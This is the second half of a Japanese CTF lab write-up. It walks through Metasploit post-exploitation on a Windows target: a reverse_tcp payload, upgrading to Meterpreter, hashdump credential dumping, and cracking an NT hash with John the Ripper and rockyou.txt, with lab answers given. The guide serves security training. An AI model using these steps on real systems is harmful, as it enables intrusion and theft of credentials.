はじめに
注意:この記事は前後編にの後編です。まず前編を読んでからこちらの記事を読んでください。
write upを前後編に分けるなど意味がわからないと思われるかもしれませんが、ぜひ前回の記事を読んでいただくようお願いします。
前回
手順
3.Escalate
前回metasploitからexploitを実行して侵入に成功しました。
ここからはmeterpreterを使って権限を昇格していきます。
前回のコマンドで指示通りに
set payload windows/x64/shell/reverse_tcp
を行っているとmeterpreterのshellが出てくるはずです。
でなければ以下のコマンドで入ります
use post/multi/manage/shell_to_meterpreter
なので答えはpost/multi/manage/shell_to_meterpreter になります
helpコマンドを見れば一覧がでます。そのなかのsessionコマンドを使います。
答えはSESSIONです。
このようにid 1とでていればOKです。また画像のようにrun 1を続けて実行してください
うまくいかなければ以下のコマンドを実行
use post/multi/manage/shell_to_meterpreter
set session 1
run
session -i 2
でコンソールに移動します。
これで権限昇格は完了しました。
参考
4. craking
先ほどのコンソールのまま言われたとおり以下のコマンドを実行。
hashdump
するとこのように出る。
よって1つ目の答えはJohn
2つ目のこたえはffb43f0de35be4d9917ac0cc8ad57f8dの部分であるハッシュを解析することでできる。
いくつかツールはあるが、Jhon the ripperなどを使うとできる。
手順としては、ファイルを新規作成して先ほどのハッシュを書き込み、rockyou.txtというワードリストを使うとできる。
最初うまくいかなかったが、調べてみると--format=NT オプションが必要だった。
touch hashdump.txt
echo "ffb43f0de35be4d9917ac0cc8ad57f8d" > hashdump.txt
john --wordlist=/PATH/rockyou.txt hash.txt --format=NT
すると答えがalqfna22とでる。
Find flags!
lsを打つとこのように無数にでるので、コマンドを変える必要がある
以下のコマンドで一発でファイルの場所を探すことができる。
search -f flag*.txt
あとはcatやダウンロードして中身を見れば完了